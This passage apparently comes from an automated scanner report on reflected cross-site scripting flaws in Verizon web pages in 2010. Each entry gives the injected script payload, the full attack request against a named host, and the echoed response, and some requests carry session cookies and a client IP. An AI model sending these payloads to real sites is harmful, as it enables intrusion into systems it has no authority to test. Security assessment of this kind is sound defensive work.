GET /myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc"%3bf834175335c HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:10 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 129009

<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc";f834175335c';
<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->
...[SNIP]...

3.134. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d8b"%3bdc8f525814c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98d8b";dc8f525814c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b"%3bdc8f525814c=1 HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7199
Date: Sat, 20 Nov 2010 03:04:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=NFJIEODCIOLCEPMOHFJNOAHN; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:09:34 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129020

<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b";dc8f525814c=1';
<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->
...[SNIP]...

3.135. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /FiOSVoice/members/CallsandMessages.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 575f9'%3b59cfc6b5eb6 was submitted in the REST URL parameter 2. This input was echoed as 575f9';59cfc6b5eb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2947
Expires: Sat, 20 Nov 2010 03:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:23 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=yx3n03emjvwwvqfejmdrmu55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navig
...[SNIP]...

3.136. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12792</script><script>alert(1)</script>85d85e30042 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "a821b7c7c96c1edc411967617847d9ee"
Last-Modified: Sat, 20 Nov 2010 01:51:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 01:51:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d035c7296-52e1-4eea-beab-671dfdb451f1|VTID%3d45df8a3c-e08a-467b-9bd9-ee6969a25fcd|SX%3d1290219077|VP%3d1|RMC%3dxg|LP%3den; expires=Fri, 20 Nov 2015 06:55:01 GMT; domain=www.verizonbusiness.com; path=/
Expires: Thu, 19 Nov 2009 19:51:17 GMT
Content-Length: 28871

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042";
var q="<q>
...[SNIP]...

3.137. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab670<script>alert(1)</script>34458ec6bd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab670<script>alert(1)</script>34458ec6bd8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68152
Expires: Sat, 20 Nov 2010 00:18:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab670<script>alert(1)</script>34458ec6bd8; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB670<SCRIPT>ALERT(1)</SCRIPT>34458EC6BD8 </DIV>
...[SNIP]...

3.138. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68156
Expires: Sat, 20 Nov 2010 00:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDDFB'><SCRIPT>ALERT(1)</SCRIPT>30CB0779E1A ' />
...[SNIP]...

3.139. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61767
Expires: Sat, 20 Nov 2010 00:15:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=TXb421a'><script>alert(1)</script>297c29e43fb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB421A'><SCRIPT>ALERT(1)</SCRIPT>297C29E43FB ' />
...[SNIP]...

3.140. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e00e8<script>alert(1)</script>275bd796ccd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe00e8<script>alert(1)</script>275bd796ccd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61763
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TXe00e8<script>alert(1)</script>275bd796ccd; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE00E8<SCRIPT>ALERT(1)</SCRIPT>275BD796CCD </DIV>
...[SNIP]...

3.141. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63787
Expires: Sat, 20 Nov 2010 00:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX50CB2'><SCRIPT>ALERT(1)</SCRIPT>84521E8362 ' />
...[SNIP]...

3.142. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179664
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' />
...[SNIP]...

3.143. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

